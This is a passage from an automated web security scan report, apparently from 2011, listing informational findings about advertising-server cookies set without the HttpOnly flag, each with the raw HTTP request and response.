GET /svc-common/script/propertyFunc.js.jsp HTTP/1.1 Host: www.atg.com Proxy-Connection: keep-alive Referer: http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0 X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ== Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Expires: Tue, 06 Sep 2011 15:35:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 15:35:19 GMT Content-Length: 5890 Connection: closeSet-Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; Path=/ //************************************************************************* // // propertyfunc.js.jsp File // // (C) Copyright 1997-2009 ATG, Inc. // All rights reserved. // // This page defines the p...[SNIP]...
13.25. http://a.tribalfusion.com/displayAd.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/displayAd.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:02 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /displayAd.js?dver=0.4&th=37103964303 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 153 X-Reuse-Index: 1 Date: Tue, 06 Sep 2011 14:59:02 GMT Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT Expires: Mon, 05 Dec 2011 14:59:02 GMTSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:02 GMT; Cache-Control: private Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 247 Connection: keep-alive var e9Manager; var e9; if (e9 !== undefined) { if (e9.displayAdFlag !== undefined) { if (e9.displayAdFlag === true) e9.displayAd(); } else e9Manager.displayAdFromE9(e9)...[SNIP]...
13.26. http://a.tribalfusion.com/i.cid
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/i.cid
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:45 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /i.cid?c=271753&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 302 Moved Temporarily P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 206 X-Reuse-Index: 1 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: privateSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:45 GMT; Content-Type: text/html Location: /z/i.cid?c=271753&d=30&page=landingPage Content-Length: 36 Connection: keep-alive <h1>Error 302 Moved Temporarily</h1>
13.27. http://a.tribalfusion.com/j.ad
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/j.ad
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j.ad?site=cnbc&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21¢er=1&url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&f=1&p=19075868&a=1&rnd=19083097 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 101 X-Reuse-Index: 1 Pragma: no-cache Cache-Control: private, no-cache, no-store, proxy-revalidateSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT; Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 267 Expires: 0 Connection: keep-alive document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250" width=300 height=250 marginwidth=0 marginh...[SNIP]...
13.28. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 102 X-Reuse-Index: 1 Pragma: no-cache Cache-Control: private, no-cache, no-store, proxy-revalidateSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT; Content-Type: text/html Vary: Accept-Encoding Content-Length: 191 Expires: 0 Connection: keep-alive <script type="text/javascript" language="JavaScript"> var img = new Image(); img.src = "http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-tribalfusion&cg=&cc=1&rnd=1228001246"; </script>
13.29. http://a.tribalfusion.com/z/i.cid
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/z/i.cid
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:46 GMT; The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /z/i.cid?c=271753&d=30&page=landingPage HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=OptOut
Response
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 307 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: privateSet-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:46 GMT; Content-Type: image/gif Content-Length: 43 Connection: keep-alive GIF89a.............!.......,........@..D..;
13.30. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:c_1=74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: c_1=74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ Location: http://www.scottrade.com?cid=AM|74|1655|1163|221&rid=B2|0&amvid=OPT_OUT&$7Dollar P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.31. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:c_1=74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2|46:1542:1206:131:1736690:55175:1315313319:L; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: c_1=74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2|46:1542:1206:131:1736690:55175:1315313319:L; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ Location: http://www.scottrade.com/LP/symbol/?cid=AM|74|1655|1182|221&rid=B2|0&amvid=OPT_OUT&active,smarttext,$7dollar P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.32. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:c_1=74:1655:1205:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: c_1=74:1655:1205:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ Location: http://www.scottrade.com?cid=AM|74|1655|1205|221&rid=B2|0&amvid=OPT_OUT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.33. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:c_1=74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: c_1=74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ Location: http://www.scottrade.com/online-trading.html?cid=AM|74|1655|1206|221&rid=B2|0&amvid=OPT_OUT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.34. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:c_1=74:1655:1209:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: c_1=74:1655:1209:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ Location: http://www.scottrade.com/online-brokerage/trading-fees-commissions.html?cid=AM|74|1655|1209|221&rid=B2|0&amvid=OPT_OUT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.35. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:c_1=74:1655:46:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: c_1=74:1655:46:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ Location: http://www.scottrade.com?cid=AM|74|1655|46|221&rid=B2|0&amvid=OPT_OUT&$7dollar P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.36. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:c_1=74:1655:721:221:0:51011:1315328751:B2|74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/** HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: nginx Date: Tue, 06 Sep 2011 17:05:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6Set-Cookie: c_1=74:1655:721:221:0:51011:1315328751:B2|74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/ Location: http://www.scottrade.com?cid=AM|74|1655|721|221&rid=B2|0&amvid=OPT_OUT&fund P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
13.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 15:05:34 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/4787978?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:05:45 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 15:05:34 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1144 function wsod_tag() { document.write('<style type="text/css">\n a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n a#wsoB:hover{color:black;text-decoration:underline;text-sh...[SNIP]...
13.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L; expires=Fri, 07-Oct-2011 15:10:44 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7865964?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 15:10:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6Set-Cookie: i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L; expires=Fri, 07-Oct-2011 15:10:44 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 751 function wsod_image1655() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"...[SNIP]...
13.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.wsod.com
Path:
/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2; expires=Fri, 07-Oct-2011 15:15:54 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/5914301?click=Insert_Click_Track_URL User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; 